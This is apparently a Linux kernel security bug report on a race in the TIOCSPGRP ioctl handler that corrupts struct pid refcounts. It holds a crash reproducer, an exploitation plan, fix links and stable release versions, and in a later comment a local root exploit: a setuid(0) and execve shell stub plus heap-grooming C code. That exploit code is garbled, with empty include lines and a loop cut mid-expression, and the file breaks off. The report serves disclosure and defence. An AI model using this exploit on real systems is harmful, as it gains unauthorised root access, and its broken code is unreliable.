tiocspgrp(), the handler for the TIOCSPGRP ioctl, has the following signature:

    static int tiocspgrp(struct tty_struct *tty, struct tty_struct *real_tty, pid_t __user *p)

It receives two tty_struct pointers because, for PTY pairs, userspace can use the same ioctl() on both sides of the pair, with slightly different semantics. tty points to the side that userspace passed to ioctl() as the file descriptor (either the TTY or the master), while real_tty always points to the TTY.

tiocspgrp() contains the following code:

    static int tiocspgrp(struct tty_struct *tty, struct tty_struct *real_tty, pid_t __user *p)
    {
    [...]
            spin_lock_irq(&tty->ctrl_lock);
            put_pid(real_tty->pgrp);
            real_tty->pgrp = get_pid(pgrp);
            spin_unlock_irq(&tty->ctrl_lock);
    [...]
    }

It always modifies the ->pgrp of the TTY but, depending on the file descriptor passed in by the caller, sometimes takes the ->ctrl_lock of the master instead. This means that it is possible to race TIOCSPGRP on the master with TIOCSPGRP on the TTY: the two callers hold different locks while updating the same pointer and the same refcounts.

The following reproducer quickly causes errors (e.g. starting with a "refcount_t: addition on 0; use-after-free." message):

======================================================================
#define _GNU_SOURCE
/* headers required by the calls below */
#include <err.h>
#include <fcntl.h>
#include <signal.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <sys/prctl.h>
#include <sys/types.h>
#include <sys/wait.h>

int main(void) {
  sync(); /* we're probably gonna crash... */

  /*
   * We may already be process group leader but want to be session leader;
   * therefore, do everything in a child process.
   */
  pid_t main_task = fork();
  if (main_task == -1)
    err(1, "initial fork");
  if (main_task != 0) {
    int status;
    if (waitpid(main_task, &status, 0) != main_task)
      err(1, "waitpid main_task");
    return 0;
  }
  if (prctl(PR_SET_PDEATHSIG, SIGKILL))
    err(1, "PR_SET_PDEATHSIG");
  if (getppid() == 1) exit(0);

  /* basic preparation */
  if (signal(SIGTTOU, SIG_IGN))
    err(1, "signal");
  if (setsid() == -1)
    err(1, "start new session");

  /* set up a new pty pair */
  int ptmx = open("/dev/ptmx", O_RDWR);
  if (ptmx == -1)
    err(1, "open ptmx");
  unlockpt(ptmx);
  int tty = open(ptsname(ptmx), O_RDWR);
  if (tty == -1)
    err(1, "open tty");

  /*
   * Let a series of children change the ->pgrp pointer
   * protected by the tty's ctrl_lock...
   */
  pid_t child = fork();
  if (child == -1)
    err(1, "fork");
  if (child == 0) {
    if (prctl(PR_SET_PDEATHSIG, SIGKILL))
      err(1, "PR_SET_PDEATHSIG");
    if (getppid() == 1) exit(0);

    while (1) {
      pid_t grandchild = fork();
      if (grandchild == -1)
        err(1, "fork grandchild");
      if (grandchild == 0) {
        if (setpgid(0, 0))
          err(1, "setpgid");
        int pgrp = getpid();
        if (ioctl(tty, TIOCSPGRP, &pgrp))
          err(1, "TIOCSPGRP (tty)");
        exit(0);
      }
      int status;
      if (waitpid(grandchild, &status, 0) != grandchild)
        err(1, "waitpid for grandchild");
    }
  }

  /*
   * ... while the parent changes the same ->pgrp pointer under the
   * ctrl_lock of the other side of the pty pair.
   */
  while (1) {
    int pgrp = getpid();
    if (ioctl(ptmx, TIOCSPGRP, &pgrp))
      err(1, "TIOCSPGRP (ptmx)");
  }
}
======================================================================

This seems to me like it would be fairly promising as a target for exploitation; for example, a strategy along the following lines might work:

 - enter a deeply nested PID namespace, such that you have a SLUB cache like pid_10 to yourself
 - take a bunch of references to two struct pid instances (e.g. through pidfds or procfs?)
 - try to hit the bug in a loop such that the refcounts are hopefully off by a bit, but both struct pid instances still exist
 - on both struct pid, drop references one by one until one is freed
 - to detect reallocation, try to get SLUB to reuse the object for another PID, then check something like pidfd_show_fdinfo() or tiocgsid() on the old pid (which mostly dump plain data from a struct pid without touching other stuff in there)
 - get the entire SLUB high-order page freed, and try to reallocate it into another slab
 - exploit the resulting type confusion, e.g. by changing the refcount of the freed struct pid

I haven't tried that yet though.

I'm going to send suggested patches for this issue and for less severe TTY locking problems around the ->session pointer in a minute. (The ->session stuff is sufficiently theoretical that it probably doesn't really need the full security treatment, but I figured it'd be less messy if I include both here...)

I have done some basic testing of these changes; the only thing that shows up as a problem is a lockdep warning about a possible deadlock when triggering the SAK logic via sysrq (involving console_lock, termios_rwsem and tty_bufhead::lock), but that also happens on master and doesn't seem related to my changes.

This bug is subject to a 90 day disclosure deadline. After 90 days elapse, the bug report will become visible to the public. The scheduled disclosure date is 2021-03-03. Disclosure at an earlier date is possible if the bug has been fixed in Linux stable releases (per agreement with security@kernel.org folks).

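The locking rule that the analysis above implies (always take the ->ctrl_lock of the object whose ->pgrp is being written) can be illustrated with a small userspace model. This is only a sketch under stated assumptions, not the kernel patch: model_pid, model_tty, model_set_pgrp() and run_model() are hypothetical names, pthread mutexes stand in for the spinlock, and a plain int stands in for the struct pid refcount.

```c
#include <assert.h>
#include <pthread.h>
#include <stddef.h>

/* Hypothetical stand-ins for struct pid and struct tty_struct. */
struct model_pid { int count; };
struct model_tty {
  pthread_mutex_t ctrl_lock;
  struct model_pid *pgrp;
};

/* Callers must hold the lock that protects the ->pgrp slot being updated. */
static struct model_pid *model_get_pid(struct model_pid *p) { if (p) p->count++; return p; }
static void model_put_pid(struct model_pid *p) { if (p) p->count--; }

/*
 * Model of the update with consistent locking: the lock taken belongs to
 * real_tty, the same object whose ->pgrp is written, no matter which side
 * of the pair the caller came in through.
 */
static void model_set_pgrp(struct model_tty *tty, struct model_tty *real_tty,
                           struct model_pid *pgrp) {
  (void)tty; /* only identifies the caller's side; never used for locking */
  pthread_mutex_lock(&real_tty->ctrl_lock);
  model_put_pid(real_tty->pgrp);
  real_tty->pgrp = model_get_pid(pgrp);
  pthread_mutex_unlock(&real_tty->ctrl_lock);
}

struct worker_arg {
  struct model_tty *tty, *real_tty;
  struct model_pid *pgrp;
  int iterations;
};

static void *worker(void *p) {
  struct worker_arg *arg = p;
  for (int i = 0; i < arg->iterations; i++)
    model_set_pgrp(arg->tty, arg->real_tty, arg->pgrp);
  return NULL;
}

/*
 * Race one updater coming in via the master against one coming in via the
 * TTY. Returns the sum of both refcounts, or -1 if a thread could not be
 * started. With consistent locking the sum stays at 3: one base reference
 * per object plus the single reference held by ->pgrp.
 */
static int run_model(int iterations) {
  struct model_pid parent = { 1 }, child = { 1 };
  struct model_tty master, slave;
  pthread_t t1, t2;

  pthread_mutex_init(&master.ctrl_lock, NULL);
  pthread_mutex_init(&slave.ctrl_lock, NULL);
  master.pgrp = NULL;
  slave.pgrp = model_get_pid(&parent);

  struct worker_arg via_master = { &master, &slave, &parent, iterations };
  struct worker_arg via_slave = { &slave, &slave, &child, iterations };

  if (pthread_create(&t1, NULL, worker, &via_master))
    return -1;
  if (pthread_create(&t2, NULL, worker, &via_slave)) {
    pthread_join(t1, NULL);
    return -1;
  }
  pthread_join(t1, NULL);
  pthread_join(t2, NULL);

  /* neither object may ever lose its base reference */
  assert(parent.count >= 1 && child.count >= 1);
  return parent.count + child.count;
}
```

Calling run_model() from a main() with a large iteration count should always return 3. Switching the two mutex calls to tty->ctrl_lock reproduces the mismatched pattern described above, where the two threads hold different locks and the counts can drift.
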
Comments

ja...@google.com #2 Dec 4, 2020 08:41AM

My suggested patches just landed in the subsystem tree:

main fix: https://git.kernel.org/pub/scm/linux/kernel/git/gregkh/tty.git/commit/?h=tty-linus&id=54ffccbf053b5b6ca4f6e45094b942fab92a25fc
other locking fix: https://git.kernel.org/pub/scm/linux/kernel/git/gregkh/tty.git/commit/?h=tty-linus&id=c8bcd9c5be24fb9e6132e97da5a35e55a83e36b9

ja...@google.com #3 Dec 7, 2020 01:15AM

fixes are merged into Linus' tree: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=d49248eb25a223b238cd7687ea92b080f595a323

ja...@google.com #4 Dec 12, 2020 01:33PM

Marked as fixed.

Fixed in stable releases from 2020-12-11:
4.4.248
4.9.248
4.14.212
4.19.163
5.4.83
5.9.14
and in mainline in 5.11

ja...@google.com #6 Oct 19, 2021 05:02PM

```
user@deb10:~/tiocspgrp$ cat Makefile
poc: poc.c rootshell
	gcc -Wall -o poc poc.c

rootshell: rootshell.o
	ld -o rootshell rootshell.o --nmagic

rootshell.o: rootshell.S
	as -o rootshell.o rootshell.S
user@deb10:~/tiocspgrp$ cat rootshell.S
.code64
.section .text, "ax"
.globl _start
_start:
  /* setuid */
  mov $105, %eax
  mov $0, %edi
  syscall

  /* execve */
  mov $59, %eax
  lea shell_str(%rip), %rdi
  lea argv(%rip), %rsi
  lea envv(%rip), %rdx
  syscall

  int $3

shell_str:
  .asciz "/bin/bash"
argv:
  .quad shell_str
  .quad 0
envv:
  .quad 0
user@deb10:~/tiocspgrp$ cat poc.c
#define _GNU_SOURCE
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

/*
 * How far the refcount of struct pid should be elevated before trying
 * to skew it down; determined by the multiplication of the two parameters.
 */
#define SOCKS_FOR_CREDS 100
#define CREDS_PER_SOCKET 100

/*
 * How often to attempt the race.
 * If this program crashes in the initial stage, lower this number.
 * A decent exploit might ramp up this number exponentially,
 * or something like that.
 */
#define SKEW_ATTEMPTS 50000

#define SYSCHK(x) ({              \
  typeof(x) __res = (x);          \
  if (__res == (typeof(x))-1)     \
    err(1, "SYSCHK(" #x ")");     \
  __res;                          \
})

void pin_cpu(int cpu) {
  cpu_set_t cpuset;
  CPU_ZERO(&cpuset);
  CPU_SET(cpu, &cpuset);
  SYSCHK(sched_setaffinity(0, sizeof(cpuset), &cpuset));
}

/*
 * We want the child to be able to close its parent's file descriptors.
 */
#define fork() syscall(__NR_clone, CLONE_FILES|SIGCHLD, NULL, NULL, NULL, 0)

static int epfd = -1;

/*
 * Fill one SLUB page (32 objects).
 * One of the objects is a seq_file (so that we can free it synchronously to
 * shove the page onto the pcpu partial list), the rest are epoll items because
 * those aren't as messy in terms of fd usage and such.
 * Note that we run this without knowing the state of the current SLUB page, so
 * usually the allocated objects actually span two SLUB pages.
 * But if you run this repeatedly, each returned seq_file should be on its own
 * SLUB page, more or less.
 */
static int fill_one_page(void) {
  const int DUPFD_COUNT = 31;
  int fd = SYSCHK(eventfd(0, 0));
  int dupfds[DUPFD_COUNT];
  for (int i=0; i [...] parent (races, may leave child refcount too low and parent refcount too high) */
      SYSCHK(ioctl(tty, TIOCSPGRP, &parent));
      *syncptr = 11;
    }
    printf("refcount should now be skewed, child exiting\n");
    exit(0);
  }
  printf("child is %d\n", child);
  for (int attempts = 0; attempts < SKEW_ATTEMPTS; attempts++) {
    /* update parent -> child (does not race) */
    SYSCHK(ioctl(ptmx, TIOCSPGRP, &child));
    *syncptr = 0;
    while (1) {
      char syncval = *syncptr;
      if ((syncval&1) == 1) {
        *syncptr = syncval + 1;
        /* at 9, we first bump to 10 so that the child can go ahead, then also go ahead ourselves */
        if (syncval == 9)
          break;
      }
    }
    /* update child -> parent (races, may leave child refcount too low and parent refcount too high) */
    SYSCHK(ioctl(ptmx, TIOCSPGRP, &parent));
    while (*syncptr != 11) /*wait*/;
  }

  int status;
  pid_t wait_res = waitpid(child, &status, 0);
  if (wait_res != child)
    err(1, "wait for child");
  if (WIFEXITED(status)) {
    printf("child exited cleanly\n");
  } else {
    errx(1, "child died weirdly");
  }

  /* drain the CPU slab */
  for (int i=32; i<64; i++)
    seqfiles[i] = SYSCHK(open("/proc/self/maps", O_RDONLY));

  /* let's make sure that the child drops its RCU reference on the pid before we do anything else */
  await_rcu_call();

  printf("gonna try to free the pid...\n");

  /*
   * free the pid and intentionally crash with a sort of double-free (actually
   * usually because the SLUB freelist pointer clobbers pid->level with garbage)
   */
  *syncptr = 0;
  pid_t df_child = fork();
  if (df_child == -1)
    err(1, "fork");
  if (df_child == 0) {
    for (int sockidx = 0; sockidx < SOCKS_FOR_CREDS; sockidx++) {
      for (int refs = 0; refs < CREDS_PER_SOCKET; refs++) {
        char dummy;
        if (read(sockpair_refhold[sockidx][1], &dummy, 1) != 1)
          err(1, "read from sockpair_refhold failed with syscall return???");
        (*syncptr)++;
      }
    }
    errx(1, "unexpectedly all socket data was flushed out successfully?");
  }
  int df_status;
  if (waitpid(df_child, &df_status, 0) != df_child)
    err(1, "waitpid");
  if (!WIFSIGNALED(df_status))
    errx(1, "double-free child did not die due to signal?");
  printf("double-free child died with signal %d after dropping %d references (%d%%)\n",
    WTERMSIG(df_status), *syncptr, 100 * (*syncptr) / (SOCKS_FOR_CREDS * CREDS_PER_SOCKET));

  /* free all allocations in the slab page, putting it on the pcpu partial list */
  for (int i=0; i<64; i++)
    SYSCHK(close(seqfiles[i]));

  /*
   * Flush the pcpu partial list.
   * Our slab page should get freed onto the percpu order-0 page freelist
   * for nonmovable zone-normal pages; the others stay because they still have
   * active allocations.
   */
  for (int i=0; i